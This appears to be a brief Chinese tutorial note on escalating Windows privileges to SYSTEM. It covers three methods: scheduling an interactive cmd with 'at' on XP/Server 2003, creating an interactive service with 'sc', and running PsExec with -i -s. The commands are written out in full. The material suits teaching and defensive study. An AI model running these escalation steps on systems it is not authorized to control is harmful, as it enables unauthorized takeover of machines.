这里写自定义目录标题
windows:
- user
- administrator
- system ——内核
Linux:
- user
- root
Windows系统提权
1. 使用at提权
XP
Windows server 2003
修改密码
net user
查看系统用户
net user xxx *
查看用户状态
net user xxx
查看用户进程
有很多system创建的服务进程
将user权限提升为system
cd \
at -?
at 18:58 /interactive cmd #必须是未来时间,否则将是明天时间
关闭explorer
结果:桌面不可操作
创建explorer
发现权限变成system
2. 使用 sc 提权 (适用于 Win7 及Windows server 2008 等高级版本)
创建一个服务
默认是不启动的,可以去图形化界面自己启动
cd
sc Create syscmd binPath= “cmd /K start” type= own type= interact
sc start syscmd
3. 使用工具提权- Sysinternals Suite 套件
载之后解压使用其中的 PsExec 放在C盘根目录
C:\>PsExec.exe
-i: 交互模式
-s: 使用系统账户
C:\>psexec -i -s -d taskmgr
C:\>PsExec.exe -i -s cmd